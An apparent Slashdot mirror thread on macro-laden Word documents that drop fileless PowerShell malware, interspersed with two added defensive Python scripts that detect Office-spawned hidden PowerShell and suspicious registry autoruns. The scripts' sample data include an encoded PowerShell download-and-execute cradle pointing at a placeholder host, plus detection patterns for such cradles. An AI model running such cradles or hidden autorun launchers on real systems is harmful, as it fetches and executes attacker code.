Slashdot Mirror


Docs With Malicious Macros Deliver Fileless Malware (csoonline.com)

itwbennett writes: Researchers from Palo Alto Networks warn that attackers are using Word documents with malicious macros and PowerShell to infect computers with fileless malware. The rogue PowerShell script performs a variety of checks on the computer aimed at finding systems that are used to conduct financial transactions and to avoid systems that belong to security researchers as well as medical and educational institutions. "Due to the target-specific details contained within the spam emails and the use of memory-resident malware, this particular campaign should be treated as a high threat," the Palo Alto researchers said in a blog post. A similar combination of PowerShell and fileless malware was observed last week by researchers from the SANS Institute's Internet Storm Center.

39 comments

  1. Why the fuck is there a Canada flag icon? by Anonymous Coward · · Score: 2, Interesting

    Why the fuck is there a Canada flag icon for this submission?

    1. Re:Why the fuck is there a Canada flag icon? by ClickOnThis · · Score: 1

      Why the fuck is there a Canada flag icon for this submission?

      You beat me to it. Why indeed? Canada is only one of several countries mentioned in TFAs. It makes no sense to single Canada out.

      --
      If it weren't for deadlines, nothing would be late.
    2. Re:Why the fuck is there a Canada flag icon? by BeerCat · · Score: 1

      Would you have read it if there hadn't been?

      --
      "She's furniture with a pulse"
    3. Re:Why the fuck is there a Canada flag icon? by Lumpy · · Score: 2

      It only affects canadian windows.

      --
      Do not look at laser with remaining good eye.
    4. Re:Why the fuck is there a Canada flag icon? by Irate+Engineer · · Score: 2

      --
      Left MS Windows for Linux Mint and never looked back!
      Vote for Bernie in 2016!

    5. Re:Why the fuck is there a Canada flag icon? by Anonymous Coward · · Score: 0
    6. Re:Why the fuck is there a Canada flag icon? by wardrich86 · · Score: 1

      *Windouws

    7. Re:Why the fuck is there a Canada flag icon? by Lumpy · · Score: 1

      You forgot the Eh? you hoser..

      It's Windouws Eh?

      --
      Do not look at laser with remaining good eye.
    8. Re:Why the fuck is there a Canada flag icon? by wardrich86 · · Score: 1

      Fuckin' eh, buddy. Won't let it happen again.

  2. Word Macros by Anonymous Coward · · Score: 1

    Sorry, if you still have this shit enabled in **2016**, you deserve the pwnag3.

    1. Re:Word Macros by Anonymous Coward · · Score: 4, Insightful

      Sorry, if you still have this shit enabled in **2016**, you deserve the pwnag3.

      There's nothing wrong with macros, per se. The problem is massive design flaws like this:

      "The documents contained macros that, if allowed to run, execute a hidden instance of powershell.exe"

      A macro should be able to perform operations on a document, but there is absolutely no reason why a macro should be able to launch an external executable file. That is stupidity at a mind boggling level.
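
A triage routine for the pattern this comment quotes, an Office process spawning a hidden powershell.exe, as an added example that is not code from the Slashdot thread, the CSO article or Palo Alto Networks. The event records are constructed inline in a Sysmon-like shape; the field names, file paths, the stage-2 URL and the indicator names are assumptions, not indicators from the campaign.

```python
"""
Added example, not code from the Slashdot thread or from the Palo Alto post:
triage of process-creation events for an Office macro launching a hidden
powershell.exe. Events are constructed inline in a Sysmon-like shape; field
names, paths and the staged URL are assumptions, not campaign indicators.
"""
import base64
import re
from dataclasses import dataclass
from typing import List, Optional

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}

# Switches that almost never appear when a person or an admin script runs
# PowerShell, but are standard in macro-launched loaders. Heuristics only.
SUSPICIOUS_ARGS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "encoded_command": re.compile(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{20,})", re.I),
    "bypass_policy": re.compile(r"-ex(?:ecutionpolicy)?\s+bypass", re.I),
    "no_profile": re.compile(r"-nop(?:rofile)?\b", re.I),
    "download_cradle": re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\biex\b", re.I),
}


@dataclass
class ProcessEvent:
    parent_image: str   # Sysmon Event ID 1 ParentImage
    image: str          # Sysmon Image
    command_line: str   # Sysmon CommandLine


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def decode_encoded_command(command_line: str) -> Optional[str]:
    """Recover the script behind -EncodedCommand: base64 of UTF-16LE text."""
    m = SUSPICIOUS_ARGS["encoded_command"].search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(event: ProcessEvent) -> dict:
    """Return matched indicators, a severity, and the decoded script if any."""
    indicators: List[str] = []
    decoded = None
    if _basename(event.image) in POWERSHELL_IMAGES:
        if _basename(event.parent_image) in OFFICE_PARENTS:
            indicators.append("office_spawned_powershell")
        for name, pattern in SUSPICIOUS_ARGS.items():
            if pattern.search(event.command_line):
                indicators.append(name)
        # The cradle usually hides inside the encoded blob, so check that too.
        decoded = decode_encoded_command(event.command_line)
        if decoded and SUSPICIOUS_ARGS["download_cradle"].search(decoded):
            indicators.append("download_cradle_in_encoded_script")
    if "office_spawned_powershell" in indicators and len(indicators) > 1:
        severity = "high"
    elif indicators:
        severity = "medium"
    else:
        severity = "none"
    return {"severity": severity, "indicators": indicators, "decoded": decoded}


# Constructed sample events (assumptions, not captures from the campaign).
STAGE2_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')"
ENCODED_STAGE2 = base64.b64encode(STAGE2_SCRIPT.encode("utf-16-le")).decode()

SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass "
                 f"-EncodedCommand {ENCODED_STAGE2}"),
    ProcessEvent(r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -NoExit -Command Get-ChildItem"),
    ProcessEvent(r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
                 r"C:\Windows\splwow64.exe",
                 r"C:\Windows\splwow64.exe 12288"),
]


def triage_all(events=SAMPLE_EVENTS) -> List[dict]:
    return [triage(e) for e in events]


if __name__ == "__main__":
    for ev, result in zip(SAMPLE_EVENTS, triage_all()):
        print(f"{result['severity']:6} {_basename(ev.parent_image)} -> "
              f"{_basename(ev.image)} {result['indicators']}")
```

In practice the events come from Sysmon Event ID 1 or Windows Security event 4688 (the latter only carries the command line if the "Include command line in process creation events" policy is enabled). The parent-child relationship is the strong signal; the switch heuristics only rank what to look at first, and the decoded script is what tells an analyst where the second stage is fetched from.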

    2. Re:Word Macros by Teun · · Score: 2

      That is stupidity at a mind boggling level.

      I believe you wanted to say MS.

      --
      "The likes of Facebook and WhatsApp are free to those whose privacy is of zero value."
    3. Re:Word Macros by Anonymous Coward · · Score: 1

      If you've ever worked with VBA, you'd know that there are literally dozens, if not hundreds, of other hooks into the underlying system. The platform can manipulate sets of docs, filesystems, and retrieve data from online sources if it wants. Take away these features and I'm sure that thousands of corporate apps would quit working. It's the corporate way - allow some kind of remote automation because IT administrators are lazy. Never mind that it can't possibly be secured.

    4. Re:Word Macros by secretsquirel · · Score: 0

      If Microsoft pushed an update to disable this stuff, that would be, well, entertaining.

  3. Get one Get Many by rtb61 · · Score: 4, Insightful

    I got hit with a bundle of them, one after another after another, over a couple of weeks. I think I likely kept getting them because I did not read them but simply forwarded them to http://www.acma.gov.au/Citizen.... I assume, as part of their spam analysis with a view to prosecution, those went into someone's more law-focused inbox. Forwarding them on to your local authorities might not help much, but it certainly doesn't hurt and it is still more satisfying than just blocking them, and it might, just might, lead to keeping the authorities appropriately busy and a prosecution occurring; one can only hope, and a little hope is better than none at all. Oh yeah, and I most certainly do not run M$ Office - Libre Office for me, for many, many reasons, least of which those much repeated attacks.

    --
    Chaos - everything, everywhere, everywhen
    1. Re:Get one Get Many by HexaByte · · Score: 1

      So... If you're using Libre Office, you won't get pawn3d, right? Maybe they'll have a new rash of downloads now.

      --
      HexaByte - he's a square and a half!
    2. Re:Get one Get Many by rtb61 · · Score: 1

      Well, no, I use Libre Office because it provides all I need, they do not dick around with GUI changes to stick in patent protections to prevent competition, I do not need to relearn it every few years, to avoid document lock-in, and BASIC is a shit macro language (I actually much preferred the program-specific macros that aligned with the command structure, and I feel a spreadsheet is a better programming environment: it creates a better mind map of the program, different sheets, different areas in sheets, linking sheets; it provided a much more cellular approach to programming), I don't have to keep buying it again and again and again or else lose the ability to share documents with others, and I got really, really pissed off with changes that M$ purposefully introduced that improved their profits at the expense of user experience and usability. The only M$ program I use is the operating system and that is tied to game playing and nothing else, simply because it provides access to the greatest number of discounted games and my existing game library.

      I will never, I repeat never, use a losephone (winphone, a marketdroid joke) or tablet or TV or any other M$ program, not browsing, not email, not anything. Quite simply they are just too much of a pain in the arse to be worth dealing with, the fuck-around is just endless with them and now the privacy invasiveness to steal creative ideas, to spy on citizens for government for profit, to steal insider business secrets (make no mistake, that is the core of Windows 10: think of the billions of profits in insider trading from monitoring the home computers of business executives, what they are buying, what they are planning, what kind of mood they are in, confident or worried, chatter about their employment, and the government is letting them get away with it because insiders will share in it). As far as I am concerned they are shit-eating scum and I will avoid all possible interactions with them and there is no coming back from that.

      --
      Chaos - everything, everywhere, everywhen
  4. Fileless? by Anonymous Coward · · Score: 2, Interesting

    If it involves a document, how is it fileless?

    1. Re:Fileless? by Anonymous Coward · · Score: 0

      PowerShell doesn't need to create a file to run. It's fileless in that it is 100% in RAM.

    2. Re:Fileless? by Anonymous Coward · · Score: 0

      So what you're saying is a Microsoft Office document file contains a malicious set of macro instructions?

    3. Re:Fileless? by iMouse · · Score: 1

      The actual file itself is not malicious. You can open it on any OS with any MS Office-compatible product and be fine. It is if and when the macro is executed that it goes out to the web to pull down a downloader Trojan. Lately, the downloaders have been pulling in copies of CryptoWall and banking Trojans such as Dridex.

    4. Re:Fileless? by Anonymous Coward · · Score: 0

      An executable (here, a document that contains executable code) that downloads a trojan is not malicious?

    5. Re:Fileless? by Anonymous Coward · · Score: 0

      But the macro is still contained in the file. Fileless would be if the malware entered the system by network, stayed in RAM all the time and never needed to use a file on disk for storage. This seems not to be the case here.

  5. I have to ask by PinkyGigglebrain · · Score: 1

    How the fuck is this still happening? It's 2016 for Fates sake. How many years and versions of Word/Office have we had to deal with since "Melissa"?

    1. Re:I have to ask by Anonymous Coward · · Score: 0

      You haven't seen dirty corporate apps written entirely using VBA macros have you? You'd be amazed at the sort of garbage that people do on such a platform. These implementations rely on the shit and security nightmare that is VBA.

    2. Re:I have to ask by Anonymous Coward · · Score: 0

      I'm still waiting for Anna Kournikova to reply to my marriage proposal, the pics she sent were so hot.

    3. Re:I have to ask by Mogster · · Score: 1

      How the fuck is this still happening? It's 2016 for Fates sake. How many years and versions of Word/Office have we had to deal with since "Melissa"?

      Agree entirely - the Millennium called, it wants its macros back

      --
      ACK NAK RST
    4. Re:I have to ask by secretsquirel · · Score: 0

      Oh the things I've seen. :shudder:

      (but all in all there is a reason so much stuff gets done in VBA, development costs on proper apps would be in many cases prohibitive)

    5. Re:I have to ask by LordWabbit2 · · Score: 2

      And then had to convert the pile of VBA crap into a working website.

      These implementations rely on the shit and security nightmare that is VBA

      What security? Security would just frustrate the business people cranking out the VBA to speed up their daily jobs. The real danger here is not VBA per se, it's the corporate mentality that the company uses Macro enabled documents so they keep giving it permission to run, even when they don't recognize the document.

      --
      There are three kinds of falsehood: the first is a 'fib,' the second is a downright lie, and the third is statistics.
  6. Malicious macro malware infests computers by khz6955 · · Score: 1

    What was the name of the Operating System this malicious macro malware ran on?

  7. Seems like the easy way to avoid this... by azbot · · Score: 1

    is to become a researcher...?

    1. Re:Seems like the easy way to avoid this... by Anonymous Coward · · Score: 0

      That or fake it. Seems a lot of malware is deliberately evading security researchers and VMs. So perhaps the best offense is deploying appropriately named dummy files (nmap, debuggers, etc) to your SOE, and running it in a VM.

    2. Re:Seems like the easy way to avoid this... by iMouse · · Score: 1

      This development makes me a bit nervous since VMs and commercialized sandboxes are how a lot of products like Palo Alto's own Wildfire function.

  8. Word Macros are dangerous? Who knew? by gordguide · · Score: 1

    1995 wants its News Story back.

    1. Re:Word Macros are dangerous? Who knew? by Anonymous Coward · · Score: 0

      did you warn them about the dot com bubble, 9/11, and the housing bubble?

  9. Brainless? by Anonymous Coward · · Score: 0

    You don't understand. This is fileless in the same way as this article is brainless: There was actually a brain (of sorts) at work but it just doesn't count.

  10. RAM scanner in a hypervisor the best defense? by castionsosa · · Score: 1

    Seems in cases like this where the Trojan is entirely in RAM, the best defense would be to have a RAM scanner on the hypervisor level that would scan VMs for things like this, and if found, suspend/snapshot the VM, and allow recovery via various methods (continue with the VM, shut the VM down and run a scan against the disk image, roll the VM back to a safe snapshot, etc.)

    With ransomware also a threat, having AV on the hypervisor level can likely be the best defense, especially with VM snapshots coupled with snapshots of shared filesystems.

  11. Is it really "fileless"? by nuckfuts · · Score: 1

    A lot of antivirus protection happens during file access, which should make "fileless" malware more difficult to detect. The article is a bit fuzzy on whether this malware is truly fileless, however, describing it as "similar" to "fileless malware" that...

    creates a registry key that launches a hidden PowerShell instance at every system start-up.

    Given that "the registry" is nothing more than a collection of files, writing a key to the registry hardly qualifies as "fileless" operation.
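
An audit of the Run/RunOnce autostart keys for the persistence this comment discusses, a registry value that launches a hidden PowerShell instance at every start-up, as an added example that is not code from the thread or from the article. The .reg export it parses is constructed inline; the value names, paths and the staged URL are assumptions, not indicators from the campaign.

```python
"""
Added example, not code from the thread or from the article: an audit of the
Run/RunOnce autostart keys for a hidden PowerShell launcher, the persistence
the article describes. The .reg export below is constructed; value names,
paths and the staged URL are assumptions.
"""
import base64
import re
from typing import Dict, List, Tuple

AUTORUN_KEYS = (
    r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run",
    r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce",
    r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
    r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce",
)

# One "name"="value" line of a .reg file; backslashes and quotes are escaped with "\".
VALUE_LINE = re.compile(r'^"((?:[^"\\]|\\.)*)"="((?:[^"\\]|\\.)*)"$')

POWERSHELL = re.compile(r"\b(?:powershell|pwsh)(?:\.exe)?\b", re.I)
HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
ENCODED_COMMAND = re.compile(r"-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", re.I)


def _unescape(s: str) -> str:
    # .reg escaping: "\\" is a backslash, "\"" is a quote.
    return re.sub(r"\\(.)", r"\1", s)


def parse_reg_export(text: str) -> Dict[str, Dict[str, str]]:
    """Parse the subset of .reg syntax Run keys use: [key] headers and REG_SZ values."""
    keys: Dict[str, Dict[str, str]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
            continue
        m = VALUE_LINE.match(line)
        if m and current is not None:
            keys[current][_unescape(m.group(1))] = _unescape(m.group(2))
    return keys


def audit_autoruns(text: str) -> List[Tuple[str, str, List[str]]]:
    """Return (key, value name, reasons) for every autorun value that launches PowerShell."""
    findings = []
    for key, values in parse_reg_export(text).items():
        if key not in AUTORUN_KEYS:
            continue
        for name, cmd in values.items():
            if not POWERSHELL.search(cmd):
                continue
            reasons = ["powershell_autorun"]
            if HIDDEN_WINDOW.search(cmd):
                reasons.append("hidden_window")
            if ENCODED_COMMAND.search(cmd):
                reasons.append("encoded_command")
            findings.append((key, name, reasons))
    return findings


# Constructed export in the shape `reg export` writes (an assumption, not a capture).
STAGE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s.ps1')"
STAGE_BLOB = base64.b64encode(STAGE_SCRIPT.encode("utf-16-le")).decode()

SAMPLE_REG_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"OneDrive"="\"C:\\Users\\alice\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background"
"WindowsUpdateCheck"="powershell.exe -nop -w hidden -enc {BLOB}"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SecurityHealth"="C:\\Windows\\system32\\SecurityHealthSystray.exe"
'''.replace("{BLOB}", STAGE_BLOB)


if __name__ == "__main__":
    for key, name, reasons in audit_autoruns(SAMPLE_REG_EXPORT):
        print(f"{key}\\{name}: {', '.join(reasons)}")
```

Run it against the output of `reg export` for the four keys, or against an offline copy of the hives: HKEY_CURRENT_USER is backed by the user's NTUSER.DAT and HKEY_LOCAL_MACHINE\SOFTWARE by the SOFTWARE hive under System32\config. That is the practical side of the point made above: the second-stage script may only ever exist in memory, but the Run value that relaunches it is on disk and is visible to any tool that parses the hive.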